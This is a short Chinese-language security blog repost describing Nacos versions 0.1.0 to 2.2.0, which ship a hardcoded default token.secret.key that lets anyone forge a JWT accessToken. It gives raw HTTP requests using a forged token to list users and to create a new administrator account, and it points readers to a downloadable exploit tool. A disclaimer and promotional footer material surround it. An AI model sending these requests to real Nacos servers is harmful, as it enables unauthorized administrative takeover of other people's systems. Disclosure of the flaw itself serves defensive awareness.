Alibaba Nacos存在默认token.secret.key

admin 2023年3月24日12:06:11Alibaba Nacos存在默认token.secret.key已关闭评论104 views字数 672阅读2分14秒阅读模式

===================================

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

Nacos漏洞版本/conf 默认配置文件 application.properties  中,nacos.core.auth.default.token.secret.key 使用了硬编码,使用该key可构造jwt进行token认证。认证成功后获得accessToken ,使用accessToken 可对Naocs进行任意操作(这不废话么,已经登录了)

影响范围:0.1.0 <= Nacos <= 2.2.0

图片

0x02 安装与使用

1、查看用户列表
GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1Host: xxxaccessToken: xxxxxx
2、新增管理员
POST /nacos/v1/auth/users HTTP/1.1Host: xxxContent-Type: application/x-www-form-urlencodedaccessToken: xxxContent-Length: 27username=fuck&password=fuck

0x03 项目链接下载

1、通过阅读原文,到项目地址下载

2、后台回复:工具获取网盘链接,仅当天有效


0x04 每日送书福利

1、后台回复:送书,获取当日送书抽奖码。

2、送书规则


图片

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月24日12:06:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Alibaba Nacos存在默认token.secret.keyhttps://cn-sec.com/archives/1625155.html